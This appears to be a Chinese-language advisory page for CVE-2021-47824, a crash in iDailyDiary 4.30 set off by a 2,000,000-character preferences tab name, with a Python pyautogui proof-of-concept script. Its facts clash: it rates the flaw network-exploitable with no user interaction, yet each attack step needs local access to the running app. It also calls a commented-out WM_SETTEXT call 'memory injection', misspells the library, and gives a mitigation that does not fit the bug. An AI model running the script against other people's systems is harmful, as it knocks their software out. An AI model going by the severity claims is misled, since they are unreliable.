CVE-2021-47824 iDailyDiary 4.30 拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2021-47824

漏洞类型

缓冲区溢出/拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

iDailyDiary 4.30

漏洞概述

CVE-2021-47824是iDailyDiary 4.30版本中的一个拒绝服务（DoS）漏洞。该漏洞存在于应用程序的首选项设置模块中，具体位于日记标签名称字段。攻击者可以通过向该字段输入超长字符串（高达2,000,000个字符）来触发应用程序崩溃。由于该漏洞的CVSS评分为7.5，属于高危级别，且攻击向量为网络远程攻击，无需任何认证或用户交互，因此具有较高的实际威胁性。iDailyDiary是一款流行的个人日记软件，广泛应用于Windows平台。攻击者利用此漏洞可以无需任何权限即可使目标用户的应用程序崩溃，造成服务中断。虽然该漏洞不影响数据的机密性和完整性，但会导致应用程序可用性完全丧失，用户需要重启应用程序才能恢复正常使用。建议用户及时更新到最新版本或采取临时缓解措施以避免受到该漏洞的影响。

技术细节

该漏洞的根本原因在于iDailyDiary 4.30应用程序在处理用户输入时缺乏适当的输入验证和边界检查。具体来说，当用户在首选项设置中修改日记标签名称时，应用程序直接将用户输入复制到固定大小的内存缓冲区中，而没有对输入长度进行限制。攻击者可以通过粘贴功能向标签名称字段输入2,000,000个字符的超长字符串，导致缓冲区溢出。当应用程序尝试处理这个超长字符串时，会触发内存访问违规，进而导致应用程序崩溃。该漏洞属于经典的缓冲区溢出类型，但由于其影响的是应用程序的可用性而非代码执行能力，因此被归类为拒绝服务漏洞。攻击者可以利用此漏洞在用户打开首选项设置并修改标签名称时触发，无需特殊的系统权限或复杂的攻击条件。

攻击链分析

STEP 1

步骤1

攻击者访问目标用户的iDailyDiary应用程序

STEP 2

步骤2

攻击者打开应用程序的首选项（Preferences）设置菜单

STEP 3

步骤3

攻击者定位到日记标签名称（Tab Name）字段

STEP 4

步骤4

攻击者使用粘贴功能向该字段输入2,000,000个字符的超长字符串

STEP 5

步骤5

应用程序尝试将超长字符串复制到固定大小的缓冲区中，导致缓冲区溢出

STEP 6

步骤6

应用程序触发内存访问违规，导致崩溃并终止运行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2021-47824 PoC - iDailyDiary 4.30 DoS
# Description: Buffer overflow in preferences tab name field
# Affected: iDailyDiary <= 4.30

import pyautogui
import time

def exploit_idailydiary_dos():
    """
    This PoC demonstrates the DoS vulnerability in iDailyDiary 4.30
    by overflowing the preferences tab name field with 2,000,000 characters.
    """
    print("[*] Starting CVE-2021-47824 DoS exploit...")
    
    # Wait for application to load
    time.sleep(2)
    
    # Generate 2,000,000 character buffer
    buffer = "A" * 2000000
    
    # Open preferences dialog (adjust coordinates for your system)
    # Typically: File -> Preferences or Tools -> Preferences
    pyautogui.hotkey('alt', 'f')  # Open File menu
    time.sleep(0.5)
    pyautogui.press('p')  # Select Preferences
    time.sleep(1)
    
    # Navigate to the tab name field and clear existing content
    # This step may vary depending on the UI layout
    pyautogui.click(x=100, y=200)  # Click on tab name field
    time.sleep(0.5)
    pyautogui.hotkey('ctrl', 'a')  # Select all
    pyautogui.press('delete')  # Clear field
    
    # Paste the 2,000,000 character buffer to trigger crash
    print("[*] Pasting 2,000,000 character buffer...")
    pyautogui.write(buffer, interval=0)  # Rapid paste
    
    # Save settings (this typically triggers the crash)
    pyautogui.press('enter')
    
    print("[+] Exploit sent. Application should crash.")

if __name__ == "__main__":
    exploit_idailydiary_dos()

# Alternative PoC using Windows API for direct memory injection:
#
# import ctypes
#
# def alternative_exploit():
#     """Alternative method using Windows API"""
#     user32 = ctypes.windll.user32
#     
#     # Find iDailyDiary window
#     hwnd = user32.FindWindowW(None, "iDailyDiary")
#     
#     if hwnd:
#         # Send buffer to overflow the tab name field
#         buffer = "A" * 2000000
#         # This would require sending WM_SETTEXT message
#         # user32.SendMessageW(hwnd, 0x000C, 0, buffer)  # WM_SETTEXT
#         pass

# Note: This PoC requires the pyaurogui library:
# pip install pyautogui
# Adjust coordinates and timing based on the target system.

影响范围

iDailyDiary <= 4.30

防御指南

临时缓解措施

在官方修复发布之前，用户可以采取以下临时缓解措施：1）限制对iDailyDiary应用程序的访问，仅允许可信用户使用；2）避免打开不可信的日记文件；3）定期备份重要数据；4）监控应用程序日志以便及时发现异常行为；5）考虑使用应用程序沙箱或虚拟机隔离运行iDailyDiary以降低风险。